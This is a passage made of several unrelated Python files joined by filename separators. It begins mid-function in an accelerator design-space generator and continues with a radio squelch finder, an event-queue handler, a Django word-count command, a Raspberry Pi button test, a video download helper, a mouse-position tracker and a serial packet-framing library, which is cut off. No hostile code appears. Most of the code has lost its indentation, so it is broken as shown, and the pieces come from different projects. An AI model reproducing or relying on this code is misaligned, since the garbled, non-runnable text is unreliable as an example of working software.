layer_num+=3
else:
                raise Exception('Currently not supporting repetitive block info input')
elif "g" in block_info[i]:
k=int(block_info[i][1])
e=int(block_info[i][4])
if num_layer_list[i]==1:
if i==0:
#TODO: confirm if the layer dimension is right
net_struct.append([16/2,16*e/2,output_dim[0],1,1])
net_struct.append([16/2,16*e/2,output_dim[0],1,1])
net_struct.append([1,16*e,output_dim[0],k,1])
net_struct.append([16*e/2,16/2,output_dim[0],1,1])
net_struct.append([16*e/2,16/2,output_dim[0],1,1])
dw+=[False,False,True,False,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
layer_block_corr[0]+=[0,1,2,3,4]
layer_num+=5
else:
net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i-1],1,stride_list[i]])
net_struct.append([num_channel_list[i-1]/2,num_channel_list[i-1]*e/2,output_dim[i-1],1,stride_list[i]])
net_struct.append([1,num_channel_list[i-1]*e,output_dim[i],k,1])
net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
net_struct.append([num_channel_list[i-1]*e/2,num_channel_list[i]/2,output_dim[i],1,1])
dw+=[False,False,True,False,False]
quant_bit=quant_list.pop(0)
layer_wise_quant+=[quant_bit,quant_bit,quant_bit,quant_bit,quant_bit]
layer_block_corr[i]+=[layer_num,layer_num+1,layer_num+2,layer_num+3,layer_num+4]
layer_num+=5
else:
                raise Exception('Currently not supporting repetitive block info input')
return net_struct,dw,layer_wise_quant,layer_block_corr
########################
##DNA specific utilities
########################
def design_choice_gen(cifar=True,edd=False,channel_part=False):
#TODO: include imagenet cases
if not channel_part:
if cifar:
acc1_space={'comp_mode':[0,1,2],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
else:
acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
#design_choices: {comp_mode:[0,1,2],fw:[2,4,6,8]...}
if edd:
acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[16,8,4,2,1],'tnbuff':[16,8,4,2,1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[16,8,4,2,1],'tn':[16,8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,2,1],'tcbuff':[28,14,7,2,1],'tmbuff':[16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,2,1],'tc':[28,14,7,2,1],'tm':[16,8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[7,2,1],'tcbuff':[7,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,2,1],'tc':[7,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,dw_acc1_space,dw_acc2_space)
else:
if cifar:
acc1_space={'comp_mode':[0,1,2],'trbuff':[32,16,8,4,2,1],'tcbuff':[32,16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[32,16,8,4,2,1],'tc':[32,16,8,4,2,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[112,56,28,14,7,1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[112,56,28,14,7,1],'tn':[112,56,28,14,7,1]}
acc5_space={'comp_mode':[0,1,2],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[32,16,8,4,2,1],'tcbuff':[32,16,8,4,2,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[32,16,8,4,2,1],'tc':[32,16,8,4,2,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[16,8,4,2,1],'tcbuff':[16,8,4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[16,8,4,2,1],'tc':[16,8,4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[8,4,2,1],'tcbuff':[8,4,2,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[1], 'tr':[8,4,2,1],'tc':[8,4,2,1],'tm':[112,56,28,14,7,1],'tn':[1]}
dw_acc5_space={'comp_mode':[0,1],'trbuff':[4,2,1],'tcbuff':[4,2,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[4,2,1],'tc':[4,2,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,acc5_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space,dw_acc5_space)
else:
acc1_space={'comp_mode':[0,1,2],'trbuff':[56,28,14,7,1],'tcbuff':[56,28,14,7,1],'tmbuff':[8,4,2,1],'tnbuff':[8,4,2,1], 'tr':[56,28,14,7,1],'tc':[56,28,14,7,1],'tm':[8,4,2,1],'tn':[8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[112,56,28,14,7,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[112,56,28,14,7,1],'tn':[112,56,28,14,7,1]}
acc5_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[32,16,8,4,2,1],'tn':[32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[56,28,14,7,1],'tcbuff':[56,28,14,7,1],'tmbuff':[8,4,2,1],'tnbuff':[1], 'tr':[56,28,14,7,1],'tc':[56,28,14,7,1],'tm':[8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[32,16,8,4,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[112,56,28,14,7,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[112,56,28,14,7,1],'tn':[1]}
dw_acc5_space={'comp_mode':[0,1],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,1],'tc':[7,1],'tm':[32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,acc5_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space,dw_acc5_space)
if edd:
acc1_space={'comp_mode':[0,1,2],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[16,8,4,2,1],'tnbuff':[16,8,4,2,1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[16,8,4,2,1],'tn':[16,8,4,2,1]}
acc2_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[96,48,24,12,8,4,3,2,1],'tnbuff':[96,48,24,12,8,4,3,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[96,48,24,12,8,4,3,2,1],'tn':[96,48,24,12,8,4,3,2,1]}
acc3_space={'comp_mode':[0,1,2],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[128,64,32,16,8,4,2,1],'tnbuff':[128,64,32,16,8,4,2,1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[128,64,32,16,8,4,2,1],'tn':[128,64,32,16,8,4,2,1]}
#acc3_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
acc4_space={'comp_mode':[0,1,2],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[64,32,16,8,4,2,1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[64,32,16,8,4,2,1]}
dw_acc1_space={'comp_mode':[0,1],'trbuff':[28,14,7,1],'tcbuff':[28,14,7,1],'tmbuff':[16,8,4,2,1],'tnbuff':[1], 'tr':[28,14,7,1],'tc':[28,14,7,1],'tm':[16,8,4,2,1],'tn':[1]}
dw_acc2_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[96,48,24,12,8,4,3,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[96,48,24,12,8,4,3,2,1],'tn':[1]}
dw_acc3_space={'comp_mode':[0,1],'trbuff':[14,7,1],'tcbuff':[14,7,1],'tmbuff':[128,64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[14,7,1],'tc':[14,7,1],'tm':[128,64,32,16,8,4,2,1],'tn':[1]}
dw_acc4_space={'comp_mode':[0,1],'trbuff':[7,1],'tcbuff':[7,1],'tmbuff':[64,32,16,8,4,2,1],'tnbuff':[1], 'tr':[7,1],'tc':[7,1],'tm':[64,32,16,8,4,2,1],'tn':[1]}
return (acc1_space,acc2_space,acc3_space,acc4_space,dw_acc1_space,dw_acc2_space,dw_acc3_space,dw_acc4_space)
def random_sample(input_dict):
np.random.seed()
result_sample=[]
result_sample_dict={}
for key in input_dict.keys():
tmp=input_dict[key][np.random.randint(len(input_dict[key]))]
if "tr"== key or "tc"==key or "tm" == key or "tn" ==key :
#tmp=np.random.randint(len(input_dict[key]))
while tmp > result_sample_dict[key+"buff"]:
tmp=input_dict[key][np.random.randint(len(input_dict[key]))]
result_sample.append(tmp)
result_sample_dict[key]=tmp
else:
result_sample.append(tmp)
result_sample_dict[key]=tmp
return result_sample
def mac_calc(net_struct):
mac=0
for i, layer in enumerate(net_struct):
mac+=layer[0]*layer[1]*layer[2]*layer[2]*layer[3]*layer[3]
return mac
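#Editor's usage sketch (hedged): a guarded demo so importing this file stays side-effect free.
#The 5-element layer layout [in_ch, out_ch, out_dim, kernel, stride] is inferred from
#cifar_convert_to_layers; numpy is assumed to be imported as np earlier in this file, and
#CPython 3.7+ dict ordering is assumed (random_sample above already relies on it).
if __name__ == '__main__':
    demo_net_struct = [[16, 32, 32, 3, 1]]
    #mac_calc counts in_ch*out_ch*out_dim^2*k^2 per layer: 16*32*32*32*3*3 = 4718592
    print(mac_calc(demo_net_struct))
    #draw one random tiling configuration from the first standard-conv accelerator space
    acc_spaces = design_choice_gen(cifar=True, channel_part=False)
    print(random_sample(acc_spaces[0]))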
|
set-squelch.py
|
#!/bin/python
"""Sets the squelch level."""
import subprocess
import threading
import time
import io
def bytes_at_squelch_level(squelch_level):
"""Returns the number of bytes received at a squelch level."""
# Python 3
if hasattr(subprocess, 'DEVNULL'):
devnull = subprocess.DEVNULL
else:
# Python 2 :(
devnull = open('/dev/null', 'w')
p1 = subprocess.Popen(
(
'rtl_fm',
'-f',
'144.390M',
'-s',
'22050',
'-l',
str(squelch_level),
'-'
),
stdout=subprocess.PIPE,
stderr=devnull
)
p2 = subprocess.Popen(('wc', '-c'), stdin=p1.stdout, stdout=subprocess.PIPE)
def sleep_then_kill_p1():
time.sleep(2.0)
p1.kill()
threading.Thread(target=sleep_then_kill_p1).start()
bytes_count = int(p2.communicate()[0])
if isinstance(devnull, io.IOBase):
devnull.close()
return bytes_count
def find_squelch_level() -> int:
"""Finds the squelch level."""
def squelched(limit: int) -> bool:
"""Returns true if it was squelched."""
print(f"Trying {limit}")
        bytes_count = bytes_at_squelch_level(limit)
print(f'Squelch level {limit} produced {bytes_count} bytes')
if bytes_count < 10000:
return True
return False
    # Exponential search upward for a squelched upper bound, then binary search between the limits.
lower_limit = 10
upper_limit = 20
for i in range(15):
if squelched(upper_limit):
break
time.sleep(1)
lower_limit = upper_limit
upper_limit = int(upper_limit * 1.5)
while lower_limit + 1 <= upper_limit:
mid = (lower_limit + upper_limit) // 2
if squelched(mid):
upper_limit = mid
else:
lower_limit = mid + 1
return mid
def main():
"""Main."""
level = find_squelch_level() + 10
print('Setting squelch level to {}'.format(level))
with open('squelch-level.txt', 'w') as file_:
file_.write('{}'.format(level))
if __name__ == '__main__':
main()
|
handler.py
|
import logging
import time
from abc import ABCMeta
from collections import defaultdict
from Queue import Queue
from threading import Lock, Thread
from __main__ import config
from ..types import ActiveHunter, Hunter
from ...core.events.types import HuntFinished
import threading
global queue_lock
queue_lock = Lock()
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.hooks = defaultdict(list)
self.running = True
self.workers = list()
for i in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
else:
self.active_hunters[hook] = hook.__doc__
elif Hunter in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logging.debug('{} subscribed to {}'.format(hook, event))
# getting instantiated event object
def publish_event(self, event, caller=None):
logging.debug('Event {} got published with {}'.format(event.__class__, event))
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if caller:
event.previous = caller.event
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
queue_lock.acquire()
hook = self.get()
queue_lock.release()
try:
hook.execute()
except Exception as ex:
logging.debug(ex.message)
self.task_done()
logging.debug("closing thread...")
def notifier(self):
time.sleep(2)
while self.unfinished_tasks > 0:
logging.debug("{} tasks left".format(self.unfinished_tasks))
time.sleep(3)
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
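# Editor's usage sketch (hedged, left as a comment so importing this module does not
# register an extra hunter): hunters subscribe to an event type through the decorator
# above and are instantiated with the triggering event; execute() then runs on a worker thread.
#
# @handler.subscribe(HuntFinished)
# class ExampleHunter(Hunter):
#     """Hypothetical hunter reacting to the end of a hunt."""
#     def __init__(self, event):
#         self.event = event
#     def execute(self):
#         logging.debug("hunt finished")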
|
update_number_of_words.py
|
# -*- encoding: utf-8 -*-
from queue import Queue, Empty
from threading import Thread
from django.core.management.base import BaseCommand
from ...models import TransTask
from ...utils import get_num_words
class Command(BaseCommand):
help = "Update the number of words to translate in every task"
queue = Queue()
num_threads = 80
threads = []
def handle(self, *args, **options):
self.queue = Queue()
self.stdout.write('Reading tasks...')
for it in TransTask.objects.all():
self.queue.put({'id': it.id, 'num': get_num_words(it.object_field_value)})
for i in range(self.num_threads):
t = Thread(target=self.worker_elements)
t.start()
self.threads.append(t)
self.stdout.write("Waiting for empty queue")
self.queue.join()
self.stop_threads()
def stop_threads(self):
for t in self.threads:
t.join()
self.stdout.write('Exiting main thread')
    def worker_elements(self):
        while not self.queue.empty():
            try:
                item = self.queue.get(timeout=2)
            except Empty:
                break
            try:
                TransTask.objects.filter(pk=item['id']).update(number_of_words=item['num'])
            finally:
                # call task_done() only for items actually retrieved from the queue
                self.queue.task_done()
|
buttontest(v1).py
|
from gpiozero import Button
from time import sleep
import tkinter as tk
from threading import Thread
button17 = Button("GPIO17")
button22 = Button("GPIO22")
button23 = Button("GPIO23")
button27 = Button("GPIO27")
class buttonpush():
def __init__(self):
#Thread.__init__(self)
self.b = False
def checkloop(self):
while True:
if button17.is_pressed:
if self.b == False:
self.b = True
print("pressed")
root.destroy()
else:
self.b = False
print("off")
while button17.is_pressed: pass
#if button22.is_pressed:
# print("button23 pressed")
#if button23.is_pressed:
# print("button23 pressed")
#if button27.is_pressed:
# print("button27 pressed")
print("before root")
root = tk.Tk()
print("before class made")
button17class = buttonpush()
print("before thread")
check17 = Thread(target=button17class.checkloop)
print("before start")
check17.start()
print("before mainloop")
root.mainloop()
|
utils.py
|
import threading
from playhouse.shortcuts import model_to_dict
from bilibili_api import Bilibili
from model import Video, PlayList
def models_to_dict(models):
return [model_to_dict(orm) for orm in models]
def thead(video_id):
client = Bilibili()
client.download_by_id(video_id)
Video.update(is_completed=True).where(Video.id == video_id).execute()
def thread_download(video_id):
n = threading.Thread(target=thead, args=(video_id,))
n.start()
return "ok"
def thead_list(play_list_id):
play = PlayList.get_by_id(play_list_id)
while True:
first_video = play.videos\
.where(Video.is_progress == 0) \
.where(Video.is_completed == 0) \
.first()
if first_video is None:
break
updated = Video.update(is_progress=1) \
.where(Video.is_progress == 0) \
.where(Video.id == first_video.id).execute()
if updated == 1:
client = Bilibili()
client.download_by_id(first_video.id)
Video.update(is_completed=True).where(Video.id == first_video.id).execute()
def thread_download_list(play_list_id):
for i in range(1, 5):
n = threading.Thread(target=thead_list, args=(play_list_id,))
n.start()
return "ok"
|
mouse.py
|
from threading import Thread
from time import time, sleep
# Create the mouse controller
from pynput.mouse import Controller
from . import BaseModule
mouse = Controller()
class MouseModule(BaseModule):
move_events = list()
def __init__(self):
super().__init__(name='mouse', source=100)
        # Create a thread to track mouse movements
        # and pass the list of movement events into the function
clicks_thread = Thread(target=move_event, args=(self.events,))
clicks_thread.start()
def move_event(key_events):
while True:
values = mouse.position
        # If the data is the same, add only a single data block
if (len(key_events) > 0 and key_events[-1]['x'] != values[0] and key_events[-1]['y'] != values[1]) or len(
key_events) == 0:
key_events.append(dict(x=values[0], y=values[1], time=time()))
sleep(1)
|
core.py
|
"""
Simple package for receiving and sending data over serial. Data is framed in packets:
|START|LEN|ID|... PAYLOAD BYTES ...|CRC|END|
Each packet has:
id: 0-255 identifier byte
payload: any data bytes
Packets are received and sent using two threads handling the serial port.
Callback targeting specific packet ids are supported. Packets that have a callback assigned are not placed in the
read queue!
"""
from queue import Queue, Full, Empty
from serial import Serial, SerialException
from threading import Thread, Lock
import struct
from time import sleep, time
import crcmod
import logging
def bytes2str(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return b.decode("UTF-8")
def str2bytes(s):
if not isinstance(s, str):
raise TypeError("s must be string instance.")
return s.encode("UTF-8")
def bytes2int(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return int.from_bytes(b, byteorder="little", signed=True)
def int2bytes(i):
"""
Convert int to bytes.
:param i: 32 bit integer inside range -2147483648, 2147483647
:return: 4 bytes
"""
if not isinstance(i, int):
raise TypeError("i must be int")
return struct.pack("i", i)
def bytes2float(b):
if not isinstance(b, (bytes, bytearray)):
raise TypeError("b must be bytes or bytearray instance.")
if isinstance(b, bytearray):
b = bytes(b)
return struct.unpack("f", b)[0]
def float2bytes(f):
"""
Convert float to bytes.
:param f: float
:return: 4 bytes
"""
if isinstance(f, int):
f = float(f)
elif not isinstance(f, float):
raise TypeError("f must be float")
b = struct.pack("f", f)
return b
class SimpleSerialException(Exception):
pass
class FrameError(SimpleSerialException):
""" Raised when received frame is invalid. """
pass
class ReplyTimeout(SimpleSerialException):
""" Raised when reply is not received in time. """
pass
class CRCError(SimpleSerialException):
""" Raised when CRC does not match. """
pass
class SimpleSerial:
"""
Create simple_serial_python object.
"""
def __init__(self, port=None, baud=None, serial=None, start=0x02, end=0x03, esc=0x01, payload_max_len=8,
packet_timeout=1.0, queue_max_len=100, **kwargs):
"""
:param port: serial port
:param baud: baud rate
:param serial: serial instance, must not be opened
:param start: start byte flag value
:param end: end byte flag value
:param esc: esc byte flag value
:param payload_max_len: maximum payload length in bytes
        :param packet_timeout: time allowed after the start byte before a partially received packet is discarded
:param queue_max_len: maximum receive, send, callback queue length
        :param kwargs: extra keyword arguments passed to Serial
"""
# set up serial port
if not serial and port and baud:
            self.serial = Serial(baudrate=baud, timeout=1e-1, **kwargs)
self.serial.port = port
elif serial and not port and not baud:
self.serial = serial
else:
raise ValueError("Please set 'port' and 'baud', or set 'serial'.")
self.serial_alive = False
self.received_queue = Queue(maxsize=queue_max_len)
self.send_queue = Queue(maxsize=queue_max_len)
self.byte_count = 0
self.current_id = None
self.current_len = None
self.current_payload = None
self.esc_active = False
self.START = start
self.END = end
self.ESC = esc
self.payload_max_len = payload_max_len
self.packet_timeout = packet_timeout
self.receive_thread = None
self.send_thread = None
self.callback_thread = None
self.lock = Lock()
self.callbacks = {}
""" A dict of set callbacks {id: callback function}"""
self.callback_queue = Queue(maxsize=queue_max_len)
self.awaiting_reply = {}
""" A dict of sent packets, waiting for reply {id: (sent_time, frame, nr_send_tries_left, replied payload)}"""
self.packet_start_time = 0.
self.is_open = False
self.logger = logging.getLogger("SimpleSerial({})".format(self.serial.port))
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close(wait_send=False)
def open(self):
"""
Open serial communication, start receive/send/callback threads.
"""
self.is_open = True
self.serial.open()
self.serial_alive = True
self.receive_thread = Thread(target=self.receive_worker, daemon=True)
self.send_thread = Thread(target=self.send_worker, daemon=True)
self.callback_thread = Thread(target=self.callback_worker, daemon=True)
self.receive_thread.start()
self.send_thread.start()
self.callback_thread.start()
self.logger.debug("Open")
def close(self, wait_send=True):
"""
Close serial communication, stop threads.
:param wait_send: True to wait until all pending messages are sent.
"""
if wait_send:
while self.send_queue.qsize() > 0:
sleep(1/1000)
self.is_open = False
self.receive_thread.join()
self.send_thread.join()
self.callback_thread.join()
self.serial.close()
self.serial_alive = False
self.logger.debug("Closed")
def send(self, id, payload, expect_reply=False, block_until_reply=False, reply_timeout=1.0, resend=0):
"""
Convert payload to bytes from int/float/string and puts it to send queue.
Ignores packet if send queue is full.
:param id: packet id
:param payload: bytes, int, float, str
:param expect_reply: Set True for packets that trigger a reply. When this is True, received packets with same
id are not placed in receive queue. To read reply use block_until_reply or register a callback.
:param block_until_reply: True to block until reply received and return received (id, payload)
        :param reply_timeout: time to wait for reply, if expect_reply is True
:param resend: if expect_reply is True, number of send retries if reply is not received.
            Total number of tries is 1 + resend
"""
# Check id
if not isinstance(id, int) or not 0 <= id <= 255:
raise ValueError("id must be int in range [0, 255]. Currently: {}".format(id))
# Check type
if isinstance(payload, bytes):
pass
elif isinstance(payload, int):
payload = int2bytes(payload)
elif isinstance(payload, float):
payload = float2bytes(payload)
elif isinstance(payload, str):
payload = str2bytes(payload)
else:
raise TypeError("Payload is type '{}'. Must be bytes/int/float/string.".format(type(payload)))
# Check length
if len(payload) > self.payload_max_len:
raise ValueError("Payload (len={}) must not be longer than payload_max_len={}."
.format(len(payload), self.payload_max_len))
frame = self.frame(id, payload)
try:
self.send_queue.put((id, frame), block=False)
except Full:
self.logger.debug("Send queue full, packet id {} discarded".format(id))
# Schedule resending and wait reply
if expect_reply:
self.awaiting_reply[id] = [time(), reply_timeout, frame, resend, None]
if block_until_reply:
# wait for reply and return replied payload
            while True:
try:
reply = self.awaiting_reply[id][4]
except KeyError:
raise ReplyTimeout
else:
if reply:
return reply
sleep(1e-3)
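    # Editor's usage sketch (hedged; `ss` is a hypothetical opened SimpleSerial instance):
    #   reply_payload = ss.send(5, 3.14, expect_reply=True, block_until_reply=True, reply_timeout=0.5)
    # This raises ReplyTimeout if no packet with id 5 arrives in time; alternatively,
    # register ss.set_callback(5, handle_reply) for non-blocking handling of replies.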
def read(self, block=True, timeout=None):
"""
Return item from received packets queue.
:param block: true to block until packet available
:param timeout: if none, blocks indefinitely, otherwise Empty exception is raised if no packet available
after timeout seconds
:return tuple: id, payload
"""
return self.received_queue.get(block, timeout)
def escape(self, data):
"""
Escapes data with ESC byte.
:param data: data to escape. type: bytes or bytearray
:return: escaped bytearray
"""
escaped = bytearray()
for b in data:
if b not in [self.START, self.END, self.ESC]:
escaped.append(b)
else:
escaped.append(self.ESC)
escaped.append(b)
return escaped
def unescape(self, data):
"""
Remove escape bytes from data
:param data: data to remove escapes from, type: bytes or bytearray
:return: bytearray
"""
unescaped = bytearray()
esc = False
for b in data:
if not esc:
if b != self.ESC:
unescaped.append(b)
else:
esc = True
continue
else:
unescaped.append(b)
esc = False
return unescaped
def frame(self, id, payload):
"""
Frame payload data. Insert START, END and ESC bytes, length and id.
:param id: packet id
:param payload: data to frame, type bytes or bytearray
:return: framed data
"""
payload = bytearray(payload)
# Extend payload with calculated CRC
payload.extend(self.calc_crc(payload))
packet = bytearray()
packet.append(self.START) # start byte
packet.append(0) # length byte placeholder
packet.append(id) # id byte
packet += self.escape(payload) # escaped payload
packet.append(self.END) # end byte
packet[1] = len(packet) # set length byte to length of whole frame
return packet
def unframe(self, packet):
"""
Un-frame data. Remove flag bytes
Raises FrameError if frame is invalid.
:param packet: framed data
:return: dict with keys: length, id, payload
"""
if packet[0] != self.START:
raise FrameError("START byte missing.")
if packet[-1] != self.END:
raise FrameError("END byte missing.")
length = packet[1]
if length != len(packet):
raise FrameError("Length mismatch.")
